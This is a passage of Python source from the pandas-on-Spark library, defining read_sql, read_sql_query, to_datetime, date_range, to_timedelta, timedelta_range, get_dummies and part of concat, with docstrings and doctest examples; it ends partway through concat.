TODO: add `coerce_float`, `params`, and 'parse_dates' parameters\ndef read_sql_query(\n sql: str, con: str, index_col: Optional[Union[str, List[str]]] = None, **options: Any\n) -> DataFrame:\n \"\"\"Read SQL query into a DataFrame.\n\n Returns a DataFrame corresponding to the result set of the query\n string. Optionally provide an `index_col` parameter to use one of the\n columns as the index, otherwise default index will be used.\n\n .. note:: Some database might hit the issue of Spark: SPARK-27596\n\n Parameters\n ----------\n sql : string SQL query\n SQL query to be executed.\n con : str\n A JDBC URI could be provided as str.\n\n .. note:: The URI must be JDBC URI instead of Python's database URI.\n\n index_col : string or list of strings, optional, default: None\n Column(s) to set as index(MultiIndex).\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n read_sql_table : Read SQL database table into a DataFrame.\n read_sql\n\n Examples\n --------\n >>> ps.read_sql_query('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n reader = default_session().read\n reader.option(\"query\", sql)\n reader.option(\"url\", con)\n reader.options(**options)\n sdf = reader.format(\"jdbc\").load()\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\n# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters\ndef read_sql(\n sql: str,\n con: str,\n index_col: Optional[Union[str, List[str]]] = None,\n columns: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read SQL query or database table into a DataFrame.\n\n This function is a convenience wrapper around ``read_sql_table`` and\n ``read_sql_query`` (for backward compatibility). It will delegate\n to the specific function depending on the provided input. A SQL query\n will be routed to ``read_sql_query``, while a database table name will\n be routed to ``read_sql_table``. Note that the delegated function might\n have more specific notes about their functionality not listed here.\n\n .. note:: Some database might hit the issue of Spark: SPARK-27596\n\n Parameters\n ----------\n sql : string\n SQL query to be executed or a table name.\n con : str\n A JDBC URI could be provided as str.\n\n .. note:: The URI must be JDBC URI instead of Python's database URI.\n\n index_col : string or list of strings, optional, default: None\n Column(s) to set as index(MultiIndex).\n columns : list, default: None\n List of column names to select from SQL table (only used when reading\n a table).\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n read_sql_table : Read SQL database table into a DataFrame.\n read_sql_query : Read SQL query into a DataFrame.\n\n Examples\n --------\n >>> ps.read_sql('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n >>> ps.read_sql('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n striped = sql.strip()\n if \" \" not in striped: # TODO: identify the table name or not more precisely.\n return read_sql_table(sql, con, index_col=index_col, columns=columns, **options)\n else:\n return read_sql_query(sql, con, index_col=index_col, **options)\n\n\n@no_type_check\ndef to_datetime(\n arg,\n errors: str = \"raise\",\n format: Optional[str] = None,\n unit: Optional[str] = None,\n infer_datetime_format: bool = False,\n origin: str = \"unix\",\n):\n \"\"\"\n Convert argument to datetime.\n\n Parameters\n ----------\n arg : integer, float, string, datetime, list, tuple, 1-d array, Series\n or DataFrame/dict-like\n\n errors : {'ignore', 'raise', 'coerce'}, default 'raise'\n\n - If 'raise', then invalid parsing will raise an exception\n - If 'coerce', then invalid parsing will be set as NaT\n - If 'ignore', then invalid parsing will return the input\n format : string, default None\n strftime to parse time, eg \"%d/%m/%Y\", note that \"%f\" will parse\n all the way up to nanoseconds.\n unit : string, default None\n unit of the arg (D,s,ms,us,ns) denote the unit, which is an\n integer or float number. This will be based off the origin.\n Example, with unit='ms' and origin='unix' (the default), this\n would calculate the number of milliseconds to the unix epoch start.\n infer_datetime_format : boolean, default False\n If True and no `format` is given, attempt to infer the format of the\n datetime strings, and if it can be inferred, switch to a faster\n method of parsing them. In some cases this can increase the parsing\n speed by ~5-10x.\n origin : scalar, default 'unix'\n Define the reference date. The numeric values would be parsed as number\n of units (defined by `unit`) since this reference date.\n\n - If 'unix' (or POSIX) time; origin is set to 1970-01-01.\n - If 'julian', unit must be 'D', and origin is set to beginning of\n Julian Calendar. Julian day number 0 is assigned to the day starting\n at noon on January 1, 4713 BC.\n - If Timestamp convertible, origin is set to Timestamp identified by\n origin.\n\n Returns\n -------\n ret : datetime if parsing succeeded.\n Return type depends on input:\n\n - list-like: DatetimeIndex\n - Series: Series of datetime64 dtype\n - scalar: Timestamp\n\n In case when it is not possible to return designated types (e.g. when\n any element of input is before Timestamp.min or after Timestamp.max)\n return will have datetime.datetime type (or corresponding\n array/Series).\n\n Examples\n --------\n Assembling a datetime from multiple columns of a DataFrame. The keys can be\n common abbreviations like ['year', 'month', 'day', 'minute', 'second',\n 'ms', 'us', 'ns']) or plurals of the same\n\n >>> df = ps.DataFrame({'year': [2015, 2016],\n ... 'month': [2, 3],\n ... 'day': [4, 5]})\n >>> ps.to_datetime(df)\n 0 2015-02-04\n 1 2016-03-05\n dtype: datetime64[ns]\n\n If a date does not meet the `timestamp limitations\n `_, passing errors='ignore'\n will return the original input instead of raising any exception.\n\n Passing errors='coerce' will force an out-of-bounds date to NaT,\n in addition to forcing non-dates (or non-parseable dates) to NaT.\n\n >>> ps.to_datetime('13000101', format='%Y%m%d', errors='ignore') # doctest: +SKIP\n datetime.datetime(1300, 1, 1, 0, 0)\n >>> ps.to_datetime('13000101', format='%Y%m%d', errors='coerce')\n NaT\n\n Passing infer_datetime_format=True can often-times speedup a parsing\n if its not an ISO8601 format exactly, but in a regular format.\n\n >>> s = ps.Series(['3/11/2000', '3/12/2000', '3/13/2000'] * 1000)\n >>> s.head()\n 0 3/11/2000\n 1 3/12/2000\n 2 3/13/2000\n 3 3/11/2000\n 4 3/12/2000\n dtype: object\n\n >>> import timeit\n >>> timeit.timeit(\n ... lambda: repr(ps.to_datetime(s, infer_datetime_format=True)),\n ... number = 1) # doctest: +SKIP\n 0.35832712500000063\n\n >>> timeit.timeit(\n ... lambda: repr(ps.to_datetime(s, infer_datetime_format=False)),\n ... number = 1) # doctest: +SKIP\n 0.8895321660000004\n\n Using a unix epoch time\n\n >>> ps.to_datetime(1490195805, unit='s')\n Timestamp('2017-03-22 15:16:45')\n >>> ps.to_datetime(1490195805433502912, unit='ns')\n Timestamp('2017-03-22 15:16:45.433502912')\n\n Using a non-unix epoch origin\n\n >>> ps.to_datetime([1, 2, 3], unit='D', origin=pd.Timestamp('1960-01-01'))\n DatetimeIndex(['1960-01-02', '1960-01-03', '1960-01-04'], dtype='datetime64[ns]', freq=None)\n \"\"\"\n\n # mappings for assembling units\n # From pandas: pandas.core.tools.datetimes\n _unit_map = {\n \"year\": \"year\",\n \"years\": \"year\",\n \"month\": \"month\",\n \"months\": \"month\",\n \"day\": \"day\",\n \"days\": \"day\",\n \"hour\": \"h\",\n \"hours\": \"h\",\n \"minute\": \"m\",\n \"minutes\": \"m\",\n \"second\": \"s\",\n \"seconds\": \"s\",\n \"ms\": \"ms\",\n \"millisecond\": \"ms\",\n \"milliseconds\": \"ms\",\n \"us\": \"us\",\n \"microsecond\": \"us\",\n \"microseconds\": \"us\",\n }\n\n def pandas_to_datetime(\n pser_or_pdf: Union[pd.DataFrame, pd.Series], cols: Optional[List[str]] = None\n ) -> Series[np.datetime64]:\n if isinstance(pser_or_pdf, pd.DataFrame):\n pser_or_pdf = pser_or_pdf[cols]\n return pd.to_datetime(\n pser_or_pdf,\n errors=errors,\n format=format,\n unit=unit,\n infer_datetime_format=infer_datetime_format,\n origin=origin,\n )\n\n if isinstance(arg, Series):\n return arg.pandas_on_spark.transform_batch(pandas_to_datetime)\n if isinstance(arg, DataFrame):\n unit = {k: _unit_map[k.lower()] for k in arg.keys() if k.lower() in _unit_map}\n unit_rev = {v: k for k, v in unit.items()}\n list_cols = [unit_rev[\"year\"], unit_rev[\"month\"], unit_rev[\"day\"]]\n for u in [\"h\", \"m\", \"s\", \"ms\", \"us\"]:\n value = unit_rev.get(u)\n if value is not None and value in arg:\n list_cols.append(value)\n\n psdf = arg[list_cols]\n return psdf.pandas_on_spark.transform_batch(pandas_to_datetime, list_cols)\n return pd.to_datetime(\n arg,\n errors=errors,\n format=format,\n unit=unit,\n infer_datetime_format=infer_datetime_format,\n origin=origin,\n )\n\n\ndef date_range(\n start: Union[str, Any] = None,\n end: Union[str, Any] = None,\n periods: Optional[int] = None,\n freq: Optional[Union[str, DateOffset]] = None,\n tz: Optional[Union[str, tzinfo]] = None,\n normalize: bool = False,\n name: Optional[str] = None,\n inclusive: str = \"both\",\n **kwargs: Any,\n) -> DatetimeIndex:\n \"\"\"\n Return a fixed frequency DatetimeIndex.\n\n Parameters\n ----------\n start : str or datetime-like, optional\n Left bound for generating dates.\n end : str or datetime-like, optional\n Right bound for generating dates.\n periods : int, optional\n Number of periods to generate.\n freq : str or DateOffset, default 'D'\n Frequency strings can have multiples, e.g. '5H'.\n tz : str or tzinfo, optional\n Time zone name for returning localized DatetimeIndex, for example\n 'Asia/Hong_Kong'. By default, the resulting DatetimeIndex is\n time zone naive.\n normalize : bool, default False\n Normalize start/end dates to midnight before generating date range.\n name : str, default None\n Name of the resulting DatetimeIndex.\n inclusive : {\"both\", \"neither\", \"left\", \"right\"}, default \"both\"\n Include boundaries; Whether to set each bound as closed or open.\n\n .. versionadded:: 4.0.0\n\n **kwargs\n For compatibility. Has no effect on the result.\n\n Returns\n -------\n rng : DatetimeIndex\n\n See Also\n --------\n DatetimeIndex : An immutable container for datetimes.\n\n Notes\n -----\n Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,\n exactly three must be specified. If ``freq`` is omitted, the resulting\n ``DatetimeIndex`` will have ``periods`` linearly spaced elements between\n ``start`` and ``end`` (closed on both sides).\n\n To learn more about the frequency strings, please see `this link\n `__.\n\n Examples\n --------\n **Specifying the values**\n\n The next four examples generate the same `DatetimeIndex`, but vary\n the combination of `start`, `end` and `periods`.\n\n Specify `start` and `end`, with the default daily frequency.\n\n >>> ps.date_range(start='1/1/2018', end='1/08/2018') # doctest: +SKIP\n DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',\n '2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `start` and `periods`, the number of periods (days).\n\n >>> ps.date_range(start='1/1/2018', periods=8) # doctest: +SKIP\n DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',\n '2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `end` and `periods`, the number of periods (days).\n\n >>> ps.date_range(end='1/1/2018', periods=8) # doctest: +SKIP\n DatetimeIndex(['2017-12-25', '2017-12-26', '2017-12-27', '2017-12-28',\n '2017-12-29', '2017-12-30', '2017-12-31', '2018-01-01'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `start`, `end`, and `periods`; the frequency is generated\n automatically (linearly spaced).\n\n >>> ps.date_range(\n ... start='2018-04-24', end='2018-04-27', periods=3\n ... ) # doctest: +SKIP\n DatetimeIndex(['2018-04-24 00:00:00', '2018-04-25 12:00:00',\n '2018-04-27 00:00:00'],\n dtype='datetime64[ns]', freq=None)\n\n **Other Parameters**\n\n Changed the `freq` (frequency) to ``'M'`` (month end frequency).\n\n >>> ps.date_range(start='1/1/2018', periods=5, freq='M') # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',\n '2018-05-31'],\n dtype='datetime64[ns]', freq=None)\n\n Multiples are allowed\n\n >>> ps.date_range(start='1/1/2018', periods=5, freq='3M') # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',\n '2019-01-31'],\n dtype='datetime64[ns]', freq=None)\n\n `freq` can also be specified as an Offset object.\n\n >>> ps.date_range(\n ... start='1/1/2018', periods=5, freq=pd.offsets.MonthEnd(3)\n ... ) # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',\n '2019-01-31'],\n dtype='datetime64[ns]', freq=None)\n\n `inclusive` controls whether to include `start` and `end` that are on the\n boundary. The default includes boundary points on either end.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive=\"both\"\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03', '2017-01-04'],\n dtype='datetime64[ns]', freq=None)\n\n Use ``inclusive='left'`` to exclude `end` if it falls on the boundary.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive='left'\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03'], dtype='datetime64[ns]', freq=None)\n\n Use ``inclusive='right'`` to exclude `start` if it falls on the boundary.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive='right'\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-02', '2017-01-03', '2017-01-04'], dtype='datetime64[ns]', freq=None)\n \"\"\"\n assert freq not in [\"N\", \"ns\"], \"nanoseconds is not supported\"\n assert tz is None, \"Localized DatetimeIndex is not supported\"\n\n return cast(\n DatetimeIndex,\n ps.from_pandas(\n pd.date_range(\n start=start,\n end=end,\n periods=periods,\n freq=freq,\n tz=tz,\n normalize=normalize,\n name=name,\n inclusive=inclusive,\n **kwargs,\n )\n ),\n )\n\n\n@no_type_check\ndef to_timedelta(\n arg,\n unit: Optional[str] = None,\n errors: str = \"raise\",\n):\n \"\"\"\n Convert argument to timedelta.\n\n Parameters\n ----------\n arg : str, timedelta, list-like or Series\n The data to be converted to timedelta.\n unit : str, optional\n Denotes the unit of the arg for numeric `arg`. Defaults to ``\"ns\"``.\n\n Possible values:\n * 'W'\n * 'D' / 'days' / 'day'\n * 'hours' / 'hour' / 'hr' / 'h'\n * 'm' / 'minute' / 'min' / 'minutes' / 'T'\n * 'S' / 'seconds' / 'sec' / 'second'\n * 'ms' / 'milliseconds' / 'millisecond' / 'milli' / 'millis' / 'L'\n * 'us' / 'microseconds' / 'microsecond' / 'micro' / 'micros' / 'U'\n * 'ns' / 'nanoseconds' / 'nano' / 'nanos' / 'nanosecond' / 'N'\n\n Must not be specified when `arg` context strings and ``errors=\"raise\"``.\n errors : {'ignore', 'raise', 'coerce'}, default 'raise'\n - If 'raise', then invalid parsing will raise an exception.\n - If 'coerce', then invalid parsing will be set as NaT.\n - If 'ignore', then invalid parsing will return the input.\n\n Returns\n -------\n ret : timedelta64, TimedeltaIndex or Series of timedelta64 if parsing succeeded.\n\n See Also\n --------\n DataFrame.astype : Cast argument to a specified dtype.\n to_datetime : Convert argument to datetime.\n\n Notes\n -----\n If the precision is higher than nanoseconds, the precision of the duration is\n truncated to nanoseconds for string inputs.\n\n Examples\n --------\n Parsing a single string to a Timedelta:\n\n >>> ps.to_timedelta('1 days 06:05:01.00003')\n Timedelta('1 days 06:05:01.000030')\n >>> ps.to_timedelta('15.5us') # doctest: +SKIP\n Timedelta('0 days 00:00:00.000015500')\n\n Parsing a list or array of strings:\n\n >>> ps.to_timedelta(['1 days 06:05:01.00003', '15.5us', 'nan']) # doctest: +SKIP\n TimedeltaIndex(['1 days 06:05:01.000030', '0 days 00:00:00.000015500', NaT],\n dtype='timedelta64[ns]', freq=None)\n\n Converting numbers by specifying the `unit` keyword argument:\n\n >>> ps.to_timedelta(np.arange(5), unit='s') # doctest: +SKIP\n TimedeltaIndex(['0 days 00:00:00', '0 days 00:00:01', '0 days 00:00:02',\n '0 days 00:00:03', '0 days 00:00:04'],\n dtype='timedelta64[ns]', freq=None)\n >>> ps.to_timedelta(np.arange(5), unit='d') # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['0 days', '1 days', '2 days', '3 days', '4 days'],\n dtype='timedelta64[ns]', freq=None)\n \"\"\"\n\n def pandas_to_timedelta(pser: pd.Series) -> np.timedelta64:\n return pd.to_timedelta(\n arg=pser,\n unit=unit,\n errors=errors,\n )\n\n if isinstance(arg, Series):\n return arg.transform(pandas_to_timedelta)\n\n else:\n return pd.to_timedelta(\n arg=arg,\n unit=unit,\n errors=errors,\n )\n\n\ndef timedelta_range(\n start: Union[str, Any] = None,\n end: Union[str, Any] = None,\n periods: Optional[int] = None,\n freq: Optional[Union[str, DateOffset]] = None,\n name: Optional[str] = None,\n closed: Optional[str] = None,\n) -> TimedeltaIndex:\n \"\"\"\n Return a fixed frequency TimedeltaIndex, with day as the default frequency.\n\n Parameters\n ----------\n start : str or timedelta-like, optional\n Left bound for generating timedeltas.\n end : str or timedelta-like, optional\n Right bound for generating timedeltas.\n periods : int, optional\n Number of periods to generate.\n freq : str or DateOffset, default 'D'\n Frequency strings can have multiples, e.g. '5H'.\n name : str, default None\n Name of the resulting TimedeltaIndex.\n closed : {None, 'left', 'right'}, optional\n Make the interval closed with respect to the given frequency to\n the 'left', 'right', or both sides (None, the default).\n\n Returns\n -------\n TimedeltaIndex\n\n Notes\n -----\n Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,\n exactly three must be specified. If ``freq`` is omitted, the resulting\n ``TimedeltaIndex`` will have ``periods`` linearly spaced elements between\n ``start`` and ``end`` (closed on both sides).\n\n To learn more about the frequency strings, please see `this link\n `__.\n\n Examples\n --------\n >>> ps.timedelta_range(start='1 day', periods=4) # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days', '2 days', '3 days', '4 days'], dtype='timedelta64[ns]', freq=None)\n\n The closed parameter specifies which endpoint is included.\n The default behavior is to include both endpoints.\n\n >>> ps.timedelta_range(start='1 day', periods=4, closed='right')\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['2 days', '3 days', '4 days'], dtype='timedelta64[ns]', freq=None)\n\n The freq parameter specifies the frequency of the TimedeltaIndex.\n Only fixed frequencies can be passed, non-fixed frequencies such as ‘M’ (month end) will raise.\n\n >>> ps.timedelta_range(start='1 day', end='2 days', freq='6H')\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days 00:00:00', '1 days 06:00:00', '1 days 12:00:00',\n '1 days 18:00:00', '2 days 00:00:00'],\n dtype='timedelta64[ns]', freq=None)\n\n Specify start, end, and periods; the frequency is generated automatically (linearly spaced).\n\n >>> ps.timedelta_range(start='1 day', end='5 days', periods=4)\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days 00:00:00', '2 days 08:00:00', '3 days 16:00:00',\n '5 days 00:00:00'],\n dtype='timedelta64[ns]', freq=None)\n \"\"\"\n assert freq not in [\"N\", \"ns\"], \"nanoseconds is not supported\"\n\n return cast(\n TimedeltaIndex,\n ps.from_pandas(\n pd.timedelta_range(\n start=start,\n end=end,\n periods=periods,\n freq=freq,\n name=name,\n closed=closed,\n )\n ),\n )\n\n\ndef get_dummies(\n data: Union[DataFrame, Series],\n prefix: Optional[Union[str, List[str], Dict[str, str]]] = None,\n prefix_sep: str = \"_\",\n dummy_na: bool = False,\n columns: Optional[Union[Name, List[Name]]] = None,\n sparse: bool = False,\n drop_first: bool = False,\n dtype: Optional[Union[str, Dtype]] = None,\n) -> DataFrame:\n \"\"\"\n Convert categorical variable into dummy/indicator variables, also\n known as one hot encoding.\n\n Parameters\n ----------\n data : array-like, Series, or DataFrame\n prefix : string, list of strings, or dict of strings, default None\n String to append DataFrame column names.\n Pass a list with length equal to the number of columns\n when calling get_dummies on a DataFrame. Alternatively, `prefix`\n can be a dictionary mapping column names to prefixes.\n prefix_sep : string, default '_'\n If appending prefix, separator/delimiter to use. Or pass a\n list or dictionary as with `prefix.`\n dummy_na : bool, default False\n Add a column to indicate NaNs, if False NaNs are ignored.\n columns : list-like, default None\n Column names in the DataFrame to be encoded.\n If `columns` is None then all the columns with\n `object` or `category` dtype will be converted.\n sparse : bool, default False\n Whether the dummy-encoded columns should be be backed by\n a :class:`SparseArray` (True) or a regular NumPy array (False).\n In pandas-on-Spark, this value must be \"False\".\n drop_first : bool, default False\n Whether to get k-1 dummies out of k categorical levels by removing the\n first level.\n dtype : dtype, default np.uint8\n Data type for new columns. Only a single dtype is allowed.\n\n Returns\n -------\n dummies : DataFrame\n\n See Also\n --------\n Series.str.get_dummies\n\n Examples\n --------\n >>> s = ps.Series(list('abca'))\n\n >>> ps.get_dummies(s)\n a b c\n 0 1 0 0\n 1 0 1 0\n 2 0 0 1\n 3 1 0 0\n\n >>> df = ps.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],\n ... 'C': [1, 2, 3]},\n ... columns=['A', 'B', 'C'])\n\n >>> ps.get_dummies(df, prefix=['col1', 'col2'])\n C col1_a col1_b col2_a col2_b col2_c\n 0 1 1 0 0 1 0\n 1 2 0 1 1 0 0\n 2 3 1 0 0 0 1\n\n >>> ps.get_dummies(ps.Series(list('abcaa')))\n a b c\n 0 1 0 0\n 1 0 1 0\n 2 0 0 1\n 3 1 0 0\n 4 1 0 0\n\n >>> ps.get_dummies(ps.Series(list('abcaa')), drop_first=True)\n b c\n 0 0 0\n 1 1 0\n 2 0 1\n 3 0 0\n 4 0 0\n\n >>> ps.get_dummies(ps.Series(list('abc')), dtype=float)\n a b c\n 0 1.0 0.0 0.0\n 1 0.0 1.0 0.0\n 2 0.0 0.0 1.0\n \"\"\"\n if sparse is not False:\n raise NotImplementedError(\"get_dummies currently does not support sparse\")\n\n if columns is not None and not is_list_like(columns):\n raise TypeError(\"Input must be a list-like for parameter `columns`\")\n\n if dtype is None:\n dtype = \"byte\"\n\n if isinstance(data, Series):\n if prefix is not None:\n prefix = [str(prefix)]\n psdf = data.to_frame()\n column_labels = psdf._internal.column_labels\n remaining_columns = []\n else:\n if isinstance(prefix, str):\n raise NotImplementedError(\n \"get_dummies currently does not support prefix as string types\"\n )\n psdf = data.copy()\n\n if columns is None:\n column_labels = [\n label\n for label in psdf._internal.column_labels\n if isinstance(\n psdf._internal.spark_type_for(label), _get_dummies_default_accept_types\n )\n ]\n else:\n if is_name_like_tuple(columns):\n column_labels = [\n label\n for label in psdf._internal.column_labels\n if label[: len(columns)] == columns\n ]\n if len(column_labels) == 0:\n raise KeyError(name_like_string(columns))\n if prefix is None:\n prefix = [\n str(label[len(columns) :])\n if len(label) > len(columns) + 1\n else label[len(columns)]\n if len(label) == len(columns) + 1\n else \"\"\n for label in column_labels\n ]\n elif any(isinstance(col, tuple) for col in columns) and any(\n not is_name_like_tuple(col) for col in columns\n ):\n raise ValueError(\n \"Expected tuple, got {}\".format(\n type(set(col for col in columns if not is_name_like_tuple(col)).pop())\n )\n )\n else:\n column_labels = [\n label\n for key in columns\n for label in psdf._internal.column_labels\n if label == key or label[0] == key\n ]\n if len(column_labels) == 0:\n if columns is None:\n return psdf\n raise KeyError(\"{} not in index\".format(columns))\n\n if prefix is None:\n prefix = [str(label) if len(label) > 1 else label[0] for label in column_labels]\n\n column_labels_set = set(column_labels)\n remaining_columns = [\n (\n psdf[label]\n if psdf._internal.column_labels_level == 1\n else psdf[label].rename(name_like_string(label))\n )\n for label in psdf._internal.column_labels\n if label not in column_labels_set\n ]\n\n if any(\n not isinstance(psdf._internal.spark_type_for(label), _get_dummies_acceptable_types)\n for label in column_labels\n ):\n raise NotImplementedError(\n \"get_dummies currently only accept {} values\".format(\n \", \".join(\n [cast(Type[DataType], t).typeName() for t in _get_dummies_acceptable_types]\n )\n )\n )\n\n if prefix is not None and len(column_labels) != len(prefix):\n raise ValueError(\n \"Length of 'prefix' ({}) did not match the length of \"\n \"the columns being encoded ({}).\".format(len(prefix), len(column_labels))\n )\n elif isinstance(prefix, dict):\n prefix = [prefix[column_label[0]] for column_label in column_labels]\n\n all_values = _reduce_spark_multi(\n psdf._internal.spark_frame,\n [F.collect_set(psdf._internal.spark_column_for(label)) for label in column_labels],\n )\n for i, label in enumerate(column_labels):\n values = all_values[i]\n if isinstance(values, np.ndarray):\n values = values.tolist()\n values = sorted(values)\n if drop_first:\n values = values[1:]\n\n def column_name(v: Any) -> Name:\n if prefix is None or cast(List[str], prefix)[i] == \"\":\n return v\n else:\n return \"{}{}{}\".format(cast(List[str], prefix)[i], prefix_sep, v)\n\n for value in values:\n remaining_columns.append(\n (psdf[label].notnull() & (psdf[label] == value))\n .astype(dtype)\n .rename(column_name(value))\n )\n if dummy_na:\n remaining_columns.append(psdf[label].isnull().astype(dtype).rename(column_name(np.nan)))\n\n return psdf[remaining_columns]\n\n\n# TODO: there are many parameters to implement and support. See pandas's pd.concat.\ndef concat(\n objs: List[Union[DataFrame, Series]],\n axis: Axis = 0,\n join: str = \"outer\",\n ignore_index: bool = False,\n sort: bool = False,\n) -> Union[Series, DataFrame]:\n \"\"\"\n Concatenate pandas-on-Spark objects along a particular axis with optional set logic\n along the other axes.\n\n Parameters\n ----------\n objs : a sequence of Series or DataFrame\n Any None objects will be dropped silently unless\n they are all None in which case a ValueError will be raised\n axis : {0/'index', 1/'columns'}, default 0\n The axis to concatenate along.\n join : {'inner', 'outer'}, default 'outer'\n How to handle indexes on other axis (or axes).\n ignore_index : bool, default False\n If True, do not use the index values along the concatenation axis. The\n resulting axis will be labeled 0, ..., n - 1. This is useful if you are\n concatenating objects where the concatenation axis does not have\n meaningful indexing information. Note the index values on the other\n axes are still respected in the join.\n sort : bool, default False\n Sort non-concatenation axis if it is not already aligned.\n\n Returns\n -------\n object, type of objs\n When concatenating all ``Series`` along the index (axis=0), a\n ``Series`` is returned. When ``objs`` contains at least one\n ``DataFrame``, a ``DataFrame`` is returned. When concatenating along\n the columns (axis=1), a ``DataFrame`` is returned.\n\n See Also\n --------\n DataFrame.join : Join DataFrames using indexes.\n DataFrame.merge : Merge DataFrames by indexes or columns.\n\n Examples\n --------\n >>> from pyspark.pandas.config import set_option, reset_option\n >>> set_option(\"compute.ops_on_diff_frames\", True)\n\n Combine two ``Series``.\n\n >>> s1 = ps.Series(['a', 'b'])\n >>> s2 = ps.Series(['c', 'd'])\n >>> ps.concat([s1, s2])\n 0 a\n 1 b\n 0 c\n 1 d\n dtype: object\n\n Clear the existing index and reset it in the result\n by setting the ``ignore_index`` option to ``True``.\n\n >>> ps.concat([s1, s2], ignore_index=True)\n 0 a\n 1 b\n 2 c\n 3 d\n dtype: object\n\n Combine two ``DataFrame`` objects with identical columns.\n\n >>> df1 = ps.DataFrame([['a', 1], ['b', 2]],\n ... columns=['letter', 'number'])\n >>> df1\n letter number\n 0 a 1\n 1 b 2\n >>> df2 = ps.DataFrame([['c', 3], ['d', 4]],\n ... columns=['letter', 'number'])\n >>> df2\n letter number\n 0 c 3\n 1 d 4\n\n >>> ps.concat([df1, df2])\n letter number\n 0 a 1\n 1 b 2\n 0 c 3\n 1 d 4\n\n Combine ``DataFrame`` and ``Series`` objects with different columns.\n\n >>> ps.concat([df2, s1])\n letter number 0\n 0 c 3.0 None\n 1 d 4.0 None\n 0 None NaN a\n 1 None NaN b\n\n Combine ``DataFrame`` objects with overlapping columns\n and return everything. Columns outside the intersection will\n be filled with ``None`` values.\n\n >>> df3 = ps.DataFrame([['c', 3, 'cat'], ['d', 4, 'dog']],\n ... columns=['letter', 'number', 'animal'])\n >>> df3\n letter number animal\n 0 c 3 cat\n 1 d 4 dog\n\n >>> ps.concat([df1, df3])\n letter number animal\n 0 a 1 None\n 1 b 2 None\n 0 c 3 cat\n 1 d 4 dog\n\n Sort the columns.\n\n >>> ps.concat([df1, df3], sort=True)\n animal letter number\n 0 None a 1\n 1 None b 2\n 0 cat c 3\n 1 dog d 4\n\n Combine ``DataFrame`` objects with overlapping columns\n and return only those that are shared by passing ``inner`` to\n the ``join`` keyword argument.\n\n >>> ps.concat([df1, df3], join=\"inner\")\n letter number\n 0 a 1\n 1 b 2\n 0 c 3\n 1 d 4\n\n >>> df4 = ps.DataFrame([['bird', 'polly'], ['monkey', 'george']],\n ... columns=['animal', 'name'])\n\n Combine with column axis.\n\n >>> ps.concat([df1, df4], axis=1)\n letter number animal name\n 0 a 1 bird polly\n 1 b 2 monkey george\n\n >>> reset_option(\"compute.ops_on_diff_frames\")\n \"\"\"\n if isinstance(objs, (DataFrame, IndexOpsMixin)) or not isinstance(\n objs, Iterable\n ): # TODO: support dict\n raise TypeError(\n \"first argument must be an iterable of pandas-on-Spark \"\n \"objects, you passed an object of type \"\n '\"{name}\"'.format(name=type(objs).__name__)\n )\n\n if len(cast(Sized, objs)) == 0:\n raise ValueError(\"No objects to concatenate\")\n objs = list(filter(lambda obj: obj is not None, objs))\n if len(objs) == 0:\n raise ValueError(\"All objects passed were None\")\n\n for obj in objs:\n if not isinstance(obj, (Series, DataFrame)):\n raise TypeError(\n \"cannot concatenate object of type \"\n \"'{name}\"\n \"; only ps.Series \"\n \"and ps.DataFrame are valid\".format(name=type(objs).__name__)\n )\n\n if join not in [\"inner\", \"outer\"]:\n raise ValueError(\"Only can inner (intersect) or outer (union) join the other axis.\")\n\n axis = validate_axis(axis)\n psdf: DataFrame\n if axis == 1:\n psdfs: List[DataFrame] = [\n obj.to_frame() if isinstance(obj, Series) else obj for obj in objs\n ]\n\n level: int = min(psdf._internal.column_labels_level for psdf in psdfs)\n psdfs = [\n DataFrame._index_normalized_frame(level, psdf)\n if psdf._internal.column_labels_level > level\n else psdf\n for psdf in psdfs\n ]\n\n concat_psdf = psdfs[0]\n column_labels: List[Label] = concat_psdf._internal.column_labels.copy()\n\n psdfs_not_same_anchor = []\n for psdf in psdfs[1:]:\n 